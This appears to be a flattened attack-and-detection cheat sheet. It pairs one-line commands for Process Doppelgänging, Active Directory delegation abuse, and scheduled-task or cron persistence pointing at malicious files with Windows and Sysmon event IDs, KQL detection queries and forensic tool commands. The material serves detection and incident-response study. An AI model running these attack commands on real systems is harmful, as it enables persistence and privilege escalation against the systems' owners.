Process Doppelgänging
Invoke-ProcessDoppelganging -Target "C:\Windows\System32\notepad.exe" -Payload "C:\Path\To\Malicious.exe" -Doppelganger "C:\Windows\System32\svchost.exe"
Executes Process Doppelgänging using a custom tool or script.
4688
A new process has been created
`SecurityEvent
where EventID == 4688 and NewProcessName contains 'notepad.exe'`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and ParentImage contains 'svchost.exe'`
7
Image loaded (Sysmon)
`Sysmon
where EventID == 7 and ImageLoaded contains 'malicious.dll'`
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 pslist
Lists running processes in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Unconstrained Delegation Abuse
Set-ADComputer -Identity "targetComputer" -TrustedForDelegation $true
Configures a computer for unconstrained delegation using PowerShell.
Constrained Delegation Abuse
Set-ADComputer -Identity "targetComputer" -PrincipalsAllowedToDelegateToAccount "attackerAccount"
Sets constrained delegation on a target computer to an attacker's account.
Resource-Based Constrained Delegation Abuse
Add-ADComputerServiceAccount -Identity "targetComputer" -ServiceAccount "attackerAccount"
Abuses resource-based constrained delegation by assigning a service account to the target computer.
5136
A directory service object was modified
`SecurityEvent
where EventID == 5136 and ObjectClass == 'computer' and AttributeLDAPDisplayName == 'msDS-AllowedToDelegateTo'`
4742
A computer account was changed
`SecurityEvent
where EventID == 4742 and ObjectType == 'computer'`
4672
Special Privileges Assigned to New Logon
`SecurityEvent
where EventID == 4672`
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Windows Task Scheduling
schtasks /create /tn "TaskName" /tr "C:\Path\To\Malicious.exe" /sc daily /st 00:00
Creates a scheduled task in Windows to execute a malicious file.
Linux Cron Job Scheduling
`echo "* * * * * /path/to/malicious.sh"
crontab -`
4698
A scheduled task was created (Windows)
`SecurityEvent
where EventID == 4698`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and CommandLine contains 'schtasks'`
-
Cron job added (Linux)
`Sysmon
where EventID == 1 and CommandLine contains 'crontab'`
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 cmdscan
Scans for command line history in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.